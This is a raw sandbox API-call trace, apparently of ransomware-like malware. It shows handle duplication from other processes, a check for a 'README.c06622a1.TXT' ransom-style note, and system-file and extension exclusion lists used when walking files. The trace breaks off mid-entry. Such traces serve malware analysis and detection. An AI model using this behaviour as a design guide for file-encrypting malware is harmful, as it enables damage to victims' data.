OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8b8) returned 0x1e8 [0161.934] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.934] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.934] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.935] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.935] CloseHandle (hObject=0x1e4) returned 1 [0161.935] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0161.935] CloseHandle (hObject=0x194) returned 1 [0161.935] CloseHandle (hObject=0x1e8) returned 1 [0161.935] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8b8) returned 0x1e8 [0161.936] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.936] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.936] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.937] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.937] CloseHandle (hObject=0x1e4) returned 1 [0161.937] CloseHandle (hObject=0x194) returned 1 [0161.937] CloseHandle (hObject=0x1e8) returned 1 [0161.937] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8b8) returned 0x1e8 [0161.937] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xf8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.937] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.938] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.939] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.939] CloseHandle (hObject=0x1e4) returned 1 [0161.939] _wcsicmp (_Str1="\\EQUATION", _Str2="\\ntuser.dat.LOG1") returned -9 [0161.939] CloseHandle (hObject=0x194) returned 1 [0161.939] CloseHandle (hObject=0x1e8) returned 1 [0161.939] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8b8) returned 0x1e8 [0161.939] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xfc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.939] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.940] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.941] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.941] CloseHandle (hObject=0x1e4) returned 1 [0161.941] _wcsicmp (_Str1="\\Fonts", _Str2="\\ntuser.dat.LOG1") returned -8 [0161.941] CloseHandle (hObject=0x194) returned 1 [0161.941] CloseHandle (hObject=0x1e8) returned 1 [0161.941] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x938) returned 0x1e8 [0161.941] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.941] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.942] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.943] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.943] CloseHandle (hObject=0x1e4) returned 1 [0161.943] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0161.943] CloseHandle (hObject=0x194) returned 1 [0161.943] CloseHandle (hObject=0x1e8) returned 1 [0161.943] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x938) returned 0x1e8 [0161.943] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x74, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.943] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.944] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.945] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.945] CloseHandle (hObject=0x1e4) returned 1 [0161.945] CloseHandle (hObject=0x194) returned 1 [0161.945] CloseHandle (hObject=0x1e8) returned 1 [0161.945] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x938) returned 0x1e8 [0161.945] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x148, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.946] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.946] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.947] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.947] CloseHandle (hObject=0x1e4) returned 1 [0161.947] CloseHandle (hObject=0x194) returned 1 [0161.947] CloseHandle (hObject=0x1e8) returned 1 [0161.947] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x938) returned 0x1e8 [0161.947] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x198, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.947] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.948] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.949] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.949] CloseHandle (hObject=0x1e4) returned 1 [0161.949] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0161.949] CloseHandle (hObject=0x194) returned 1 [0161.949] CloseHandle (hObject=0x1e8) returned 1 [0161.949] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x938) returned 0x1e8 [0161.949] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1ac, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.949] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.950] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x102 [0162.202] TerminateThread (hThread=0x1e4, dwExitCode=0x0) returned 1 [0162.202] CloseHandle (hObject=0x1e4) returned 1 [0162.202] CloseHandle (hObject=0x194) returned 1 [0162.202] CloseHandle (hObject=0x1e8) returned 1 [0162.202] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x998) returned 0x1e8 [0162.203] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.203] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.203] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.206] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.206] CloseHandle (hObject=0x1e4) returned 1 [0162.206] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0162.206] CloseHandle (hObject=0x194) returned 1 [0162.207] CloseHandle (hObject=0x1e8) returned 1 [0162.207] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x998) returned 0x1e8 [0162.207] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x60, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.207] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.207] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.208] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.208] CloseHandle (hObject=0x1e4) returned 1 [0162.208] CloseHandle (hObject=0x194) returned 1 [0162.208] CloseHandle (hObject=0x1e8) returned 1 [0162.208] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x998) returned 0x1e8 [0162.208] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x154, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.208] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.209] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.210] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.210] CloseHandle (hObject=0x1e4) returned 1 [0162.210] _wcsicmp (_Str1="\\MPLog-07132009-221054.log", _Str2="\\ntuser.dat.LOG1") returned -1 [0162.210] CloseHandle (hObject=0x194) returned 1 [0162.210] CloseHandle (hObject=0x1e8) returned 1 [0162.210] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x998) returned 0x1e8 [0162.210] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x270, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.210] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.211] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.211] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.212] CloseHandle (hObject=0x1e4) returned 1 [0162.212] CloseHandle (hObject=0x194) returned 1 [0162.212] CloseHandle (hObject=0x1e8) returned 1 [0162.212] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x998) returned 0x1e8 [0162.212] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x390, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.212] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.212] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.213] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.213] CloseHandle (hObject=0x1e4) returned 1 [0162.213] _wcsicmp (_Str1="\\My", _Str2="\\ntuser.dat.LOG1") returned -1 [0162.214] CloseHandle (hObject=0x194) returned 1 [0162.214] CloseHandle (hObject=0x1e8) returned 1 [0162.214] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x998) returned 0x1e8 [0162.214] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x3f4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.214] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.215] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.215] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.216] CloseHandle (hObject=0x1e4) returned 1 [0162.216] _wcsicmp (_Str1="\\mpengine.dll", _Str2="\\ntuser.dat.LOG1") returned -1 [0162.216] CloseHandle (hObject=0x194) returned 1 [0162.216] CloseHandle (hObject=0x1e8) returned 1 [0162.216] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xbbc) returned 0x1e8 [0162.216] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.216] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.217] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.220] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.220] CloseHandle (hObject=0x1e4) returned 1 [0162.220] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0162.220] CloseHandle (hObject=0x194) returned 1 [0162.220] CloseHandle (hObject=0x1e8) returned 1 [0162.220] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xbbc) returned 0x1e8 [0162.220] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.220] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.221] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.224] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.224] CloseHandle (hObject=0x1e4) returned 1 [0162.224] CloseHandle (hObject=0x194) returned 1 [0162.224] CloseHandle (hObject=0x1e8) returned 1 [0162.225] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xbbc) returned 0x1e8 [0162.225] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xf0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.225] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.229] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.231] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.231] CloseHandle (hObject=0x1e4) returned 1 [0162.231] _wcsicmp (_Str1="\\radarrs.dll.mui", _Str2="\\ntuser.dat.LOG1") returned 4 [0162.231] CloseHandle (hObject=0x194) returned 1 [0162.231] CloseHandle (hObject=0x1e8) returned 1 [0162.231] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xbbc) returned 0x1e8 [0162.231] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x120, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.231] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.232] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.234] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.234] CloseHandle (hObject=0x1e4) returned 1 [0162.234] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0162.234] CloseHandle (hObject=0x194) returned 1 [0162.234] CloseHandle (hObject=0x1e8) returned 1 [0162.234] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xbbc) returned 0x1e8 [0162.234] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x15c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.235] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.235] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.238] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.239] CloseHandle (hObject=0x1e4) returned 1 [0162.239] CloseHandle (hObject=0x194) returned 1 [0162.239] CloseHandle (hObject=0x1e8) returned 1 [0162.239] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x86c) returned 0x1e8 [0162.239] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.239] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.240] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.241] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.241] CloseHandle (hObject=0x1e4) returned 1 [0162.241] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0162.241] CloseHandle (hObject=0x194) returned 1 [0162.241] CloseHandle (hObject=0x1e8) returned 1 [0162.241] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x86c) returned 0x1e8 [0162.241] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xb4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.241] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.242] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.243] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.243] CloseHandle (hObject=0x1e4) returned 1 [0162.243] CloseHandle (hObject=0x194) returned 1 [0162.243] CloseHandle (hObject=0x1e8) returned 1 [0162.243] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x208e20) returned 1 [0162.244] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0162.244] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x1f8e18) returned 1 [0162.245] FindNextFileW (in: hFindFile=0x152f98, lpFindFileData=0x32f01c | out: lpFindFileData=0x32f01c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0162.245] _wcsicmp (_Str1="ntuser.dat.LOG2", _Str2="README.c06622a1.TXT") returned -4 [0162.245] wcsstr (_Str="ntuser.dat.LOG2", _SubStr="README") returned 0x0 [0162.245] _wcsicmp (_Str1="autorun.inf", _Str2="ntuser.dat.LOG2") returned -13 [0162.245] wcslen (_String="autorun.inf") returned 0xb [0162.245] _wcsicmp (_Str1="boot.ini", _Str2="ntuser.dat.LOG2") returned -12 [0162.245] wcslen (_String="boot.ini") returned 0x8 [0162.245] _wcsicmp (_Str1="bootfont.bin", _Str2="ntuser.dat.LOG2") returned -12 [0162.245] wcslen (_String="bootfont.bin") returned 0xc [0162.245] _wcsicmp (_Str1="bootsect.bak", _Str2="ntuser.dat.LOG2") returned -12 [0162.245] wcslen (_String="bootsect.bak") returned 0xc [0162.245] _wcsicmp (_Str1="desktop.ini", _Str2="ntuser.dat.LOG2") returned -10 [0162.245] wcslen (_String="desktop.ini") returned 0xb [0162.245] _wcsicmp (_Str1="iconcache.db", _Str2="ntuser.dat.LOG2") returned -5 [0162.245] wcslen (_String="iconcache.db") returned 0xc [0162.245] _wcsicmp (_Str1="ntldr", _Str2="ntuser.dat.LOG2") returned -9 [0162.245] wcslen (_String="ntldr") returned 0x5 [0162.245] _wcsicmp (_Str1="ntuser.dat", _Str2="ntuser.dat.LOG2") returned -46 [0162.245] wcslen (_String="ntuser.dat") returned 0xa [0162.245] _wcsicmp (_Str1="ntuser.dat.log", _Str2="ntuser.dat.LOG2") returned -50 [0162.245] wcslen (_String="ntuser.dat.log") returned 0xe [0162.245] _wcsicmp (_Str1="ntuser.ini", _Str2="ntuser.dat.LOG2") returned 5 [0162.245] wcslen (_String="ntuser.ini") returned 0xa [0162.245] _wcsicmp (_Str1="thumbs.db", _Str2="ntuser.dat.LOG2") returned 6 [0162.245] wcslen (_String="thumbs.db") returned 0x9 [0162.245] _wcsicmp (_Str1="386", _Str2="LOG2") returned -57 [0162.245] wcslen (_String="386") returned 0x3 [0162.245] _wcsicmp (_Str1="adv", _Str2="LOG2") returned -11 [0162.245] wcslen (_String="adv") returned 0x3 [0162.245] _wcsicmp (_Str1="ani", _Str2="LOG2") returned -11 [0162.245] wcslen (_String="ani") returned 0x3 [0162.245] _wcsicmp (_Str1="bat", _Str2="LOG2") returned -10 [0162.245] wcslen (_String="bat") returned 0x3 [0162.245] _wcsicmp (_Str1="bin", _Str2="LOG2") returned -10 [0162.246] wcslen (_String="bin") returned 0x3 [0162.246] _wcsicmp (_Str1="cab", _Str2="LOG2") returned -9 [0162.246] wcslen (_String="cab") returned 0x3 [0162.246] _wcsicmp (_Str1="cmd", _Str2="LOG2") returned -9 [0162.246] wcslen (_String="cmd") returned 0x3 [0162.246] _wcsicmp (_Str1="com", _Str2="LOG2") returned -9 [0162.246] wcslen (_String="com") returned 0x3 [0162.246] _wcsicmp (_Str1="cpl", _Str2="LOG2") returned -9 [0162.246] wcslen (_String="cpl") returned 0x3 [0162.246] _wcsicmp (_Str1="cur", _Str2="LOG2") returned -9 [0162.246] wcslen (_String="cur") returned 0x3 [0162.246] _wcsicmp (_Str1="deskthemepack", _Str2="LOG2") returned -8 [0162.246] wcslen (_String="deskthemepack") returned 0xd [0162.246] _wcsicmp (_Str1="diagcab", _Str2="LOG2") returned -8 [0162.246] wcslen (_String="diagcab") returned 0x7 [0162.246] _wcsicmp (_Str1="diagcfg", _Str2="LOG2") returned -8 [0162.246] wcslen (_String="diagcfg") returned 0x7 [0162.246] _wcsicmp (_Str1="diagpkg", _Str2="LOG2") returned -8 [0162.246] wcslen (_String="diagpkg") returned 0x7 [0162.246] _wcsicmp (_Str1="dll", _Str2="LOG2") returned -8 [0162.246] wcslen (_String="dll") returned 0x3 [0162.246] _wcsicmp (_Str1="drv", _Str2="LOG2") returned -8 [0162.246] wcslen (_String="drv") returned 0x3 [0162.246] _wcsicmp (_Str1="exe", _Str2="LOG2") returned -7 [0162.246] wcslen (_String="exe") returned 0x3 [0162.246] _wcsicmp (_Str1="hlp", _Str2="LOG2") returned -4 [0162.246] wcslen (_String="hlp") returned 0x3 [0162.246] _wcsicmp (_Str1="icl", _Str2="LOG2") returned -3 [0162.246] wcslen (_String="icl") returned 0x3 [0162.246] _wcsicmp (_Str1="icns", _Str2="LOG2") returned -3 [0162.246] wcslen (_String="icns") returned 0x4 [0162.246] _wcsicmp (_Str1="ico", _Str2="LOG2") returned -3 [0162.246] wcslen (_String="ico") returned 0x3 [0162.246] _wcsicmp (_Str1="ics", _Str2="LOG2") returned -3 [0162.246] wcslen (_String="ics") returned 0x3 [0162.246] _wcsicmp (_Str1="idx", _Str2="LOG2") returned -3 [0162.247] wcslen (_String="idx") returned 0x3 [0162.247] _wcsicmp (_Str1="ldf", _Str2="LOG2") returned -11 [0162.247] wcslen (_String="ldf") returned 0x3 [0162.247] _wcsicmp (_Str1="lnk", _Str2="LOG2") returned -1 [0162.247] wcslen (_String="lnk") returned 0x3 [0162.247] _wcsicmp (_Str1="mod", _Str2="LOG2") returned 1 [0162.247] wcslen (_String="mod") returned 0x3 [0162.247] _wcsicmp (_Str1="mpa", _Str2="LOG2") returned 1 [0162.247] wcslen 